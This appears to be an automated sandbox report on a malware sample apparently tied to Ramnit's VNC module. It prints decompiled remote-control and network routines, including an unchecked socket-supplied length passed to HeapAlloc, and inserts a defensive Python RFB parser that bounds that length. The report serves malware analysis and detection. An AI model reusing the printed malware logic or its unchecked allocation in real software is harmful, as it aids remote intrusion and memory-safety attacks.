                                          									_t75 = _t224[0] & 0x000000ff;
                                          									_t115 = (_t224[0] & 0x0000ffff) << 0x00000008 | _t224[0] & 0x000000ff;
                                          									r14d = ((_t224[0] & 0x0000ffff) << 0x00000008 | _t224[0] & 0x000000ff) & 0x0000ffff;
                                          									r14d = r14d << 2;
                                          									__eflags = r14d;
                                          									if(r14d != 0) {
                                          										r8d = r14d;
                                          										_t75 = HeapAlloc(??, ??, ??);
                                          										_t241 = _t192;
                                          										__eflags = _t192;
                                          										if(_t192 != 0) {
                                          											r8d = r14d;
                                          											_t76 = E00C6BD0C(_t75, _t176, _t193, _t225, _t192, _t224, _t225, _t226);
                                          											__eflags = _t76;
                                          											if(_t76 == 0) {
                                          												E00C6C4A0(_t115 & 0x0000ffff, _t193, _t225, _t241, _t239);
                                          											}
                                          											_t230 = _t241;
                                          											goto L26;
                                          										}
                                          									}
                                          								}
                                          							} else {
                                          								_t130 = _t129 - 1;
                                          								if(_t130 == 0) {
                                          									r8d = 0xa;
                                          									_t75 = E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24);
                                          									__eflags = _t75;
                                          									if(_t75 != 0) {
                                          										goto L29;
                                          									} else {
                                          										_t224 = _a24;
                                          										_v72 = _t224[0] & 0x000000ff;
                                          										_t158 = (_t224[0] & 0x0000ffff) << 0x00000008 & 0x0000ffff | _t224[0] & 0x000000ff;
                                          										_v88 = _t158;
                                          										_v80 = ((_t224[1] & 0x0000ffff) << 0x00000008 & 0x0000ffff | _t224[1] & 0x000000ff) + _t158;
                                          										r8d =  *( *((intOrPtr*)(_t225 + 0x10)) + 0x298);
                                          										r8d = r8d - ((_t224[1] & 0x0000ffff) << 0x00000008 & 0x0000ffff | _t224[1] & 0x000000ff);
                                          										_v76 = r8d;
                                          										r8d = r8d - ((_t224[2] & 0x0000ffff) << 0x00000008 & 0x0000ffff | _t224[2] & 0x000000ff);
                                          										_v84 = r8d;
                                          										_t75 = E00C7F8C4( *((intOrPtr*)(_t225 + 0x10)),  &_v96);
                                          									}
                                          								} else {
                                          									_t134 = _t130 - 1;
                                          									if(_t134 == 0) {
                                          										r8d = 8;
                                          										__eflags = E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24);
                                          										if(__eflags != 0) {
                                          											goto L29;
                                          										} else {
                                          											_t224 = _a24;
                                          											_v100 = _t224[0] & 0x000000ff;
                                          											_v104 = (_t224[1] << 0x00000010 | _t224[1] & r12d) << 0x00000008 | _t224[1] >> 0x00000008 & r12d | _t224[1] & 0x000000ff;
                                          											_t75 = E00C7F910(__eflags,  &_v104);
                                          										}
                                          									} else {
                                          										_t138 = _t134 - 1;
                                          										if(_t138 == 0) {
                                          											r8d = 6;
                                          											__eflags = E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24);
                                          											if(__eflags != 0) {
                                          												goto L29;
                                          											} else {
                                          												_t224 = _a24;
                                          												_a32 = _t224[0] & 0x000000ff;
                                          												_a36 = (_t224[0] & 0x0000ffff) << 0x00000008 | _t224[0] & 0x000000ff;
                                          												_a38 = (_t224[1] & 0x0000ffff) << 0x00000008 | _t224[1] & 0x000000ff;
                                          												_t75 = E00C7F928(__eflags,  &_a32);
                                          											}
                                          										} else {
                                          											if(_t138 == 1) {
                                          												r8d = _t194 + 7;
                                          												if(E00C6BD98(_t152, _t192, _t193, _t225, _t225, _t230,  &_a24) != 0) {
                                          													L29:
                                          													_t224 = _a24;
                                          												} else {
                                          													_t224 = _a24;
                                          													_t75 = _t224[1] & 0x000000ff;
                                          													_t121 = (_t224[1] << 0x00000010 | _t224[1] & r12d) << 0x00000008 | _t224[1] >> 0x00000008 & r12d | _t224[1] & 0x000000ff;
                                          													if(_t121 != 0) {
                                          														r8d = _t121;
                                          														_t230 =  &(_t230[1]);
                                          														_t75 = HeapAlloc(??, ??, ??);
                                          														_t240 = _t192;
                                          														if(_t192 != 0) {
                                          															_t10 =  &(_t192[1]); // 0x4
                                          															r8d = _t121;
                                          															if(E00C6BD0C(_t75, _t176, _t193, _t225, _t10, _t224, _t225, _t226) == 0) {
                                          																 *_t240 = (_t224[1] << 0x00000010 | _t224[1] & r12d) << 0x00000008 | _t224[1] >> 0x00000008 & r12d | _t224[1] & 0x000000ff;
                                          																E00C7F8F8(_t240);
                                          															}
                                          															_t230 = _t240;
                                          															L26:
                                          															_t75 = HeapFree();
                                          														}
                                          													}
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						if(_t224 != 0) {
                                          							_t230 = _t224;
                                          							_t75 = HeapFree(??, ??, ??);
                                          							_t176 = 0;
                                          							_a24 = _t224;
                                          						}
                                          						r8d = 1;
                                          						_t194 = _t225;
                                          						_t75 = E00C6BD0C(_t75, _t176, _t193, _t194,  &_a16, _t224, _t225, _t226);
                                          					} while (_t75 == 0);
                                          				}
                                          				return _t75;
                                          			}

                                          APIs
                                            • Part of subcall function 00C6BD0C: recv.WS2_32 ref: 00C6BD3D
                                            • Part of subcall function 00C6BD0C: GetLastError.KERNEL32 ref: 00C6BD69
                                          • HeapAlloc.KERNEL32 ref: 00C6BA07
                                          • HeapAlloc.KERNEL32 ref: 00C6BBFC
                                          • HeapFree.KERNEL32 ref: 00C6BC3A
                                            • Part of subcall function 00C6BD98: HeapAlloc.KERNEL32 ref: 00C6BDCD
                                          • HeapFree.KERNEL32 ref: 00C6BCD7
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Alloc$Free$ErrorLastrecv
                                          • String ID:
                                          • API String ID: 1246853186-0
                                          • Opcode ID: 523551b6a3fa3d68c2cec88709c102f579d1cea25760c4ac410292debaad2b62
                                          • Instruction ID: d2f6aa31f66efb912b23364d726d5031a6c0a0c7aa3a3ef16d5776477a9488b0
                                          • Opcode Fuzzy Hash: 523551b6a3fa3d68c2cec88709c102f579d1cea25760c4ac410292debaad2b62
                                          • Instruction Fuzzy Hash: 17A1E8623006D056E728DF7B8A902BC6BA1FB85B84B448029EFA5C7B48DF3CDA55D710
                                          Uniqueness

                                          Uniqueness Score: -1.00%
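
Added example (not code from the report or from the sample): a parser for the RFB (VNC) client-to-server messages whose lengths match the reads in the dispatch above. After reading one type byte, the handler reads 10 bytes, or 8, or 6, or 8 bytes followed by a 32-bit length that it passes straight to HeapAlloc. Those are the sizes of the RFB FramebufferUpdateRequest, KeyEvent, PointerEvent and ClientCutText messages (RFC 6143, section 7.5), which fits the Ramnit VNC module detection on this sample. Field offsets below follow the specification rather than the 50%-quality decompilation; the cap on the ClientCutText length and the sample byte stream are assumptions and constructed input.

```python
# Added example, not code from the sandbox report or from the sample:
# parser for the RFB client-to-server messages whose sizes match the reads
# in the decompiled dispatch (10, 8, 6 and 8 + N bytes). Layouts follow
# RFC 6143 section 7.5; the sample stream at the bottom is constructed.
import struct

FRAMEBUFFER_UPDATE_REQUEST = 3   # 10 bytes
KEY_EVENT = 4                    # 8 bytes
POINTER_EVENT = 5                # 6 bytes
CLIENT_CUT_TEXT = 6              # 8-byte header + text

# Assumed cap on the client-controlled ClientCutText length. The decompiled
# code hands that length to HeapAlloc and only checks the allocation result;
# a parser should bound it before allocating anything.
MAX_CUT_TEXT = 1 << 20


def parse_client_message(buf, screen_height):
    """Parse one client message from the front of buf.

    Returns (message_dict, bytes_consumed), or (None, 0) if more data is
    needed. Raises ValueError for an unknown type or an oversized cut text.
    """
    if not buf:
        return None, 0
    mtype = buf[0]
    if mtype == FRAMEBUFFER_UPDATE_REQUEST:
        if len(buf) < 10:
            return None, 0
        incremental, x, y, w, h = struct.unpack_from(">BHHHH", buf, 1)
        # The decompiled handler turns the request into a rectangle whose
        # vertical edges are measured from the screen height (_v76/_v84).
        rect = {"left": x, "right": x + w,
                "top": screen_height - y, "bottom": screen_height - y - h}
        return ({"type": "FramebufferUpdateRequest",
                 "incremental": bool(incremental), "rect": rect}, 10)
    if mtype == KEY_EVENT:
        if len(buf) < 8:
            return None, 0
        down, keysym = struct.unpack_from(">BxxI", buf, 1)
        return {"type": "KeyEvent", "down": bool(down), "keysym": keysym}, 8
    if mtype == POINTER_EVENT:
        if len(buf) < 6:
            return None, 0
        mask, x, y = struct.unpack_from(">BHH", buf, 1)
        return {"type": "PointerEvent", "buttons": mask, "x": x, "y": y}, 6
    if mtype == CLIENT_CUT_TEXT:
        if len(buf) < 8:
            return None, 0
        (length,) = struct.unpack_from(">xxxI", buf, 1)
        if length > MAX_CUT_TEXT:
            raise ValueError("ClientCutText length %d exceeds cap" % length)
        if len(buf) < 8 + length:
            return None, 0
        text = buf[8:8 + length].decode("latin-1")
        return {"type": "ClientCutText", "text": text}, 8 + length
    raise ValueError("unknown client message type %d" % mtype)


def parse_stream(data, screen_height):
    """Split a byte stream into messages; returns (messages, unparsed tail)."""
    messages, pos = [], 0
    while pos < len(data):
        msg, used = parse_client_message(data[pos:], screen_height)
        if msg is None:
            break
        messages.append(msg)
        pos += used
    return messages, data[pos:]


# Constructed sample: full-screen update request, key press of 'a'
# (keysym 0x61), left-button click at (10, 20) and a 5-byte cut text.
SAMPLE_STREAM = (
    bytes([3, 0]) + struct.pack(">HHHH", 0, 0, 800, 600)
    + bytes([4, 1, 0, 0]) + struct.pack(">I", 0x61)
    + bytes([5, 1]) + struct.pack(">HH", 10, 20)
    + bytes([6, 0, 0, 0]) + struct.pack(">I", 5) + b"hello"
)
```

The point to take from the ClientCutText branch is the length check: in the decompiled code the 32-bit length read from the socket goes directly into HeapAlloc, and the only test afterwards is whether the allocation succeeded.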

                                          C-Code - Quality: 50%
                                          			E00C644C0() {
                                          				void* _t1;
                                          				void* _t3;
                                          				void* _t4;
                                          				long long _t7;
                                          				void* _t8;
                                          
                                          				_t7 =  *0xc956e8; // 0x0
                                          				if(_t7 == 0) {
                                          					GetModuleHandleW();
                                          					_t1 = E00C64B0C(_t3, _t4, _t7, _t8, _t7, "LoadLibraryA");
                                          					if(_t7 != 0) {
                                          						 *0xc956e8 = _t7;
                                          						return _t1;
                                          					}
                                          				}
                                          				return _t1;
                                          			}

                                          APIs
                                          • GetModuleHandleW.KERNEL32(?,?,?,?,00C64C58,00000000,00000000,00001644,00C61769), ref: 00C644D7
                                            • Part of subcall function 00C64B0C: CreateFileA.KERNEL32 ref: 00C64B82
                                            • Part of subcall function 00C64B0C: SetFilePointer.KERNEL32 ref: 00C64B9C
                                            • Part of subcall function 00C64B0C: ReadFile.KERNEL32 ref: 00C64BC2
                                            • Part of subcall function 00C64B0C: CloseHandle.KERNEL32 ref: 00C64BE3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$Handle$CloseCreateModulePointerRead
                                          • String ID: KERNEL32.DLL$LoadLibraryA
                                          • API String ID: 3967805679-1423781741
                                          • Opcode ID: a1222401d795af68890f1d57525c60e227cc159ad954cb063dab97f787ab7019
                                          • Instruction ID: 669f08cc683ed2767c78fa29972ef75327d6c498cecc6cf7045714911fc3882b
                                          • Opcode Fuzzy Hash: a1222401d795af68890f1d57525c60e227cc159ad954cb063dab97f787ab7019
                                          • Instruction Fuzzy Hash: C3D06724703E0091FD2A9B46FCD5B6433A06B95B41FC45625981D06760EF3CC6AAC314
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ClassNamelstrcmpi
                                          • String ID: ConsoleWindowClass
                                          • API String ID: 1927859406-1331846550
                                          • Opcode ID: 8780a2ced7cf2dfca45c0d095db4ba38acd3684311b174bf1c79f7595d6cf9e2
                                          • Instruction ID: 131e9a575f66e6e7947511194fb6e4f0a0002847e6ad31215861ada104fa62c3
                                          • Opcode Fuzzy Hash: 8780a2ced7cf2dfca45c0d095db4ba38acd3684311b174bf1c79f7595d6cf9e2
                                          • Instruction Fuzzy Hash: CCD05E62350A4382FB305B24EC61BA91320B744784FC082359159879B4DE2CC60ECB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E00C6C028(void* __rax, long long __rbx, void* __rcx, long long __rbp, void* __r8, void* __r10, char _a8, intOrPtr _a10, short _a16, short _a18, short _a20, long long _a24, long long _a32) {
                                          				void* __rdi;
                                          				void* __rsi;
                                          				char _t26;
                                          				signed int _t29;
                                          				char _t30;
                                          				long long _t39;
                                          				void* _t52;
                                          				void* _t53;
                                          				signed char* _t54;
                                          				void* _t63;
                                          
                                          				_t39 = __rbx;
                                          				_a24 = __rbx;
                                          				_a32 = __rbp;
                                          				_t63 = __rcx;
                                          				_t26 = 1;
                                          				EnterCriticalSection(??);
                                          				r8d = 0x400;
                                          				HeapAlloc(??, ??, ??);
                                          				r12d = 0;
                                          				_t52 = __rax;
                                          				if(__rax != 0) {
                                          					r8d = 0x100;
                                          					if(E00C6B7AC(__rbx, __rcx, __rax, __rax, _t53, __rbp) != 0) {
                                          						_t3 = _t39 + 5; // 0x6
                                          						r8d = _t3;
                                          						_a8 = 1;
                                          						_t5 =  &_a8; // 0xff20
                                          						_a10 = 0x10000;
                                          						if(E00C6BE28(_t29, _t39, _t63, _t5, _t52, _t53) != 6) {
                                          							L7:
                                          							_t26 = r12d;
                                          						} else {
                                          							_t30 = r12d;
                                          							_t7 = _t52 + 1; // 0x1
                                          							_t54 = _t7;
                                          							while(1) {
                                          								_t9 =  &_a16; // 0xff28
                                          								_a16 = _t54[1] & 0x000000ff;
                                          								r8d = 6;
                                          								_a18 =  *_t54 & 0x000000ff;
                                          								_a20 =  *(_t54 - 1) & 0x000000ff;
                                          								if(E00C6BE28(_t29, _t39, _t63, _t9, _t52, _t54) != 6) {
                                          									goto L7;
                                          								}
                                          								_t30 = _t30 + _t26;
                                          								_t54 =  &(_t54[4]);
                                          								if(_t30 < 0x100) {
                                          									continue;
                                          								} else {
                                          								}
                                          								goto L8;
                                          							}
                                          							goto L7;
                                          						}
                                          					}
                                          				}
                                          				L8:
                                          				LeaveCriticalSection();
                                          				if(_t52 != 0) {
                                          					HeapFree();
                                          				}
                                          				return _t26;
                                          			}

                                          APIs
                                          • EnterCriticalSection.KERNEL32 ref: 00C6C04A
                                          • HeapAlloc.KERNEL32 ref: 00C6C05F
                                          • LeaveCriticalSection.KERNEL32 ref: 00C6C0FB
                                          • HeapFree.KERNEL32 ref: 00C6C112
                                            • Part of subcall function 00C6BE28: memset.NTDLL ref: 00C6BE60
                                            • Part of subcall function 00C6BE28: memcpy.NTDLL ref: 00C6BE7D
                                            • Part of subcall function 00C6BE28: select.WS2_32 ref: 00C6BEB7
                                            • Part of subcall function 00C6BE28: send.WS2_32 ref: 00C6BED5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalHeapSection$AllocEnterFreeLeavememcpymemsetselectsend
                                          • String ID:
                                          • API String ID: 2810826864-0
                                          • Opcode ID: 81398009a6a8f47c096948ca7e5f70cb4bdd29e231b4033ec7875d300e2762be
                                          • Instruction ID: a58a2dad779dac4334ecaf9973573744fef8d5a281e5d9003de3d04b06f59103
                                          • Opcode Fuzzy Hash: 81398009a6a8f47c096948ca7e5f70cb4bdd29e231b4033ec7875d300e2762be
                                          • Instruction Fuzzy Hash: 5521B0227087C081EB359B56A98476AA761FB88BE0F444015EFE987B19EE7DC5C6C701
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenA.KERNEL32(?,?,00000000,00C67600), ref: 00C78086
                                          • lstrcmpiA.KERNEL32(?,?,00000000,00C67600), ref: 00C780A3
                                          • _strnicmp.NTDLL ref: 00C780B6
                                          • lstrcpyA.KERNEL32(?,?,00000000,00C67600), ref: 00C780E2
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                           • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                           • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _strnicmplstrcmpilstrcpylstrlen
                                          • String ID:
                                          • API String ID: 871734738-0
                                          • Opcode ID: cbd71f2ff7fbcea04055ae4478abf2ca31803bbae20ce1896390994ac6bdd4e5
                                          • Instruction ID: 2deff0f11c043e054f8cc3f2160756652c2b70607f65cc673e4e00d136130997
                                          • Opcode Fuzzy Hash: cbd71f2ff7fbcea04055ae4478abf2ca31803bbae20ce1896390994ac6bdd4e5
                                          • Instruction Fuzzy Hash: 6501AD762047C186DB18EB22F68836EB326E784BC4F88C121DF5A03B15DF39D59E8704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenA.KERNEL32(?,?,?,00C6B0A4), ref: 00C6AF5C
                                          • HeapAlloc.KERNEL32(?,?,?,00C6B0A4), ref: 00C6AF79
                                          • memset.NTDLL(?,?,?,00C6B0A4), ref: 00C6AF8F
                                          • memcpy.NTDLL(?,?,?,00C6B0A4), ref: 00C6AFAC
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                           • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                           • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocHeaplstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 422472530-0
                                          • Opcode ID: a23cd05c44c0ffc1fcd5926998349e2928e21e93476a014a780ebf82783f820f
                                          • Instruction ID: 1b0ec9055f900e1313247b7a10a3cf194e7a803b2e2b7310e599b9924c4bfe0c
                                          • Opcode Fuzzy Hash: a23cd05c44c0ffc1fcd5926998349e2928e21e93476a014a780ebf82783f820f
                                          • Instruction Fuzzy Hash: 66014B66711B9085EB24DF27A440719BBA1F7C8FC4F4D8125EE495B719DE39C4418B14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EnterCriticalSection.KERNEL32 ref: 00C78821
                                          • HeapFree.KERNEL32 ref: 00C78859
                                          • LeaveCriticalSection.KERNEL32 ref: 00C78872
                                          • InitializeCriticalSection.KERNEL32 ref: 00C7887F
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                           • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                           • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                           • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapInitializeLeave
                                          • String ID:
                                          • API String ID: 1934031791-0
                                          • Opcode ID: 971c002b4dae0a6c4b1a239e7c540f98f4433d411d312147f436eb1336247584
                                          • Instruction ID: 23667c960972bbf76f005d6ae7136372289f27485d4e6c89dea98ba0da676aa7
                                          • Opcode Fuzzy Hash: 971c002b4dae0a6c4b1a239e7c540f98f4433d411d312147f436eb1336247584
                                          • Instruction Fuzzy Hash: EF11DB31640F8091FB119F65E898B2877B5F798B94F948212DA5D43AA5CF38C98AC744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.720648545.00000000069B0000.00000040.00000001.sdmp, Offset: 069B0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: ?
                                          • API String ID: 0-1684325040
                                          • Opcode ID: 6f462c4f45c49333e4829bd43f885d8c231fb1b6cad3edb98e7d9d6873b31e3c
                                          • Instruction ID: 6e40326c06bf9e4ce270829823322c63d55a46dfec345033a805c433482a117d
                                          • Opcode Fuzzy Hash: 6f462c4f45c49333e4829bd43f885d8c231fb1b6cad3edb98e7d9d6873b31e3c
                                          • Instruction Fuzzy Hash: 04F1B034F00209DFDB54CBA8C981AAFB7B6BF88704F249529D5069BBA1DB74EC41CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.720648545.00000000069B0000.00000040.00000001.sdmp, Offset: 069B0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: ?
                                          • API String ID: 0-1684325040
                                          • Opcode ID: 9a55ef799af059e421d689804b99dc14fdee1e6100d233178ced3b0e33c0e66e
                                          • Instruction ID: 738287a18c369923aec4eb2b2e1abcc52a8746b05d865e39c896e9de9cae5459
                                          • Opcode Fuzzy Hash: 9a55ef799af059e421d689804b99dc14fdee1e6100d233178ced3b0e33c0e66e
                                          • Instruction Fuzzy Hash: 89914270F0434A8FDB148B68C8917AEBBB6AF85304F248966D502DF6E2DBB4DC41C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 64%
                                          			E004186C4(char __eax, void* __ebx, void* __edi, signed int __esi, void* __fp0) {
                                          				char _v8;
                                          				char _v16;
                                          				char _v20;
                                          				char _v24;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				char _v44;
                                          				char _v48;
                                          				char _v52;
                                          				char _v56;
                                          				void* _v60;
                                          				char _v64;
                                          				char _v68;
                                          				signed int _v72;
                                          				char _v76;
                                          				char _v80;
                                          				char _v84;
                                          				char _v85;
                                          				char _v86;
                                          				char _v87;
                                          				char _v92;
                                          				char* _v96;
                                          				char _v100;
                                          				char _v104;
                                          				char* _v108;
                                          				void* _v112;
                                          				char _v241;
                                          				intOrPtr _v276;
                                          				intOrPtr _v280;
                                          				intOrPtr _v284;
                                          				intOrPtr _v288;
                                          				intOrPtr _v292;
                                          				intOrPtr _v296;
                                          				intOrPtr _v300;
                                          				char _v304;
                                          				char _v308;
                                          				char _v312;
                                          				char _v316;
                                          				char _v320;
                                          				char _v324;
                                          				char _v328;
                                          				char _v332;
                                          				char _v336;
                                          				char _v340;
                                          				char _v344;
                                          				char _v348;
                                          				char _v352;
                                          				char _v356;
                                          				char _v360;
                                          				char _v364;
                                          				char _v368;
                                          				char _v372;
                                          				char _v376;
                                          				char _v380;
                                          				char _v384;
                                          				char _v388;
                                          				char _v392;
                                          				char _v396;
                                          				char _v400;
                                          				char _v404;
                                          				char _v408;
                                          				char _v412;
                                          				char _v416;
                                          				char _v420;
                                          				char _v424;
                                          				char _v428;
                                          				char _v432;
                                          				char _v436;
                                          				char _v440;
                                          				char _v444;
                                          				char _v448;
                                          				intOrPtr _v452;
                                          				intOrPtr _v456;
                                          				char _v460;
                                          				char _v464;
                                          				char _v468;
                                          				char _v472;
                                          				char _v476;
                                          				char _v480;
                                          				char _v484;
                                          				char _v488;
                                          				char _v492;
                                          				char _v496;
                                          				char _v500;
                                          				char _v504;
                                          				char _v508;
                                          				char _v512;
                                          				char _v516;
                                          				char _v520;
                                          				char _v524;
                                          				char _v528;
                                          				char _v532;
                                          				char _v536;
                                          				char _v540;
                                          				char _v544;
                                          				char _v548;
                                          				char _v552;
                                          				char _v556;
                                          				char _v560;
                                          				char _v564;
                                          				char _v568;
                                          				char _v572;
                                          				char _v576;
                                          				char _v580;
                                          				char _v584;
                                          				char _v588;
                                          				char _v592;
                                          				char _v596;
                                          				char _v600;
                                          				char _v604;
                                          				char _v608;
                                          				char _v612;
                                          				intOrPtr _v616;
                                          				char _v620;
                                          				char _v624;
                                          				char _v628;
                                          				char _v632;
                                          				char _v636;
                                          				char _v640;
                                          				char _v644;
                                          				void* _t444;
                                          				void* _t450;
                                          				intOrPtr* _t451;
                                          				intOrPtr* _t616;
                                          				intOrPtr* _t623;
                                          				intOrPtr* _t630;
                                          				intOrPtr* _t637;
                                          				intOrPtr* _t651;
                                          				intOrPtr* _t652;
                                          				intOrPtr* _t653;
                                          				intOrPtr* _t656;
                                          				intOrPtr* _t657;
                                          				intOrPtr* _t660;
                                          				intOrPtr* _t661;
                                          				intOrPtr* _t664;
                                          				intOrPtr* _t672;
                                          				void* _t678;
                                          				intOrPtr* _t715;
                                          				intOrPtr* _t751;
                                          				intOrPtr* _t752;
                                          				intOrPtr _t757;
                                          				signed int _t807;
                                          				intOrPtr* _t828;
                                          				intOrPtr* _t831;
                                          				signed int _t838;
                                          				signed int _t885;
                                          				intOrPtr _t902;
                                          				int _t921;
                                          				void* _t934;
                                          				void* _t936;
                                          				void* _t938;
                                          				intOrPtr* _t945;
                                          				intOrPtr* _t948;
                                          				intOrPtr* _t949;
                                          				intOrPtr* _t950;
                                          				signed int _t963;
                                          				signed int _t964;
                                          				void* _t965;
                                          				void* _t989;
                                          				intOrPtr _t997;
                                          				intOrPtr _t1015;
                                          				intOrPtr* _t1088;
                                          				void* _t1109;
                                          				intOrPtr* _t1111;
                                          				intOrPtr* _t1113;
                                          				intOrPtr* _t1115;
                                          				char** _t1118;
                                          				void* _t1125;
                                          				void* _t1153;
                                          				void* _t1155;
                                          				void* _t1156;
                                          				intOrPtr _t1160;
                                          				intOrPtr _t1161;
                                          				void* _t1164;
                                          				void* _t1191;
                                          				void* _t1197;
                                          				void* _t1205;
                                          				void* _t1207;
                                          
                                          				_t1207 = __fp0;
                                          				_t1157 = __esi;
                                          				_t1151 = __edi;
                                          				_t962 = __ebx;
                                          				_t1160 = _t1161;
                                          				_t965 = 0x50;
                                          				do {
                                          					_push(0);
                                          					_push(0);
                                          					_t965 = _t965 - 1;
                                          					_t1162 = _t965;
                                          				} while (_t965 != 0);
                                          				_push(__ebx);
                                          				_push(__esi);
                                          				_push(__edi);
                                          				_v8 = __eax;
                                          				E00403980(_v8);
                                          				_push(_t1160);
                                          				_push(0x41985e);
                                          				_push( *[fs:eax]);
                                          				 *[fs:eax] = _t1161;
                                          				E004034E4( &_v76);
                                          				_v86 = 0;
                                          				_v85 = 0;
                                          				E0040357C( &_v92, 0x41987c);
                                          				E00405668();
                                          				E00407DE0( &_v308, _t1162);
                                          				_push( &_v308);
                                          				E00406CE8( &_v312, __ebx, __esi); // executed
                                          				_pop(_t444);
                                          				E00403798(_t444, _v312);
                                          				_t450 = CreateMutexA(0, 0, E00403990(_v308)); // executed
                                          				_v112 = _t450;
                                          				_t451 =  *0x41b12c; // 0x41c6a4
                                          				if( *((intOrPtr*)( *_t451))() == 0xb7) {
                                          					L71:
                                          					_pop(_t997);
                                          					 *[fs:eax] = _t997;
                                          					_push(E00419868);
                                          					E004034E4( &_v644);
                                          					E00403BF4( &_v640, 2);
                                          					E004034E4( &_v632);
                                          					E00403BF4( &_v628, 5);
                                          					E00403508( &_v608, 9);
                                          					E00403BDC( &_v572);
                                          					E00403508( &_v568, 2);
                                          					E00403BDC( &_v560);
                                          					E00403508( &_v556, 2);
                                          					E00403BDC( &_v548);
                                          					E00403508( &_v544, 2);
                                          					E00403BDC( &_v536);
                                          					E00403508( &_v532, 2);
                                          					E00403BDC( &_v524);
                                          					E00403508( &_v520, 2);
                                          					E00403BDC( &_v512);
                                          					E00403508( &_v508, 2);
                                          					E00403BDC( &_v500);
                                          					E00403508( &_v496, 2);
                                          					E00403BDC( &_v488);
                                          					E00403508( &_v484, 0xa);
                                          					E00403BF4( &_v444, 2);
                                          					E004034E4( &_v436);
                                          					E00403BF4( &_v432, 3);
                                          					E004034E4( &_v420);
                                          					E00403BF4( &_v416, 2);
                                          					E004034E4( &_v408);
                                          					E00403BF4( &_v404, 8);
                                          					E004034E4( &_v372);
                                          					E00403BF4( &_v368, 4);
                                          					E00403508( &_v352, 0xc);
                                          					E004034E4( &_v68);
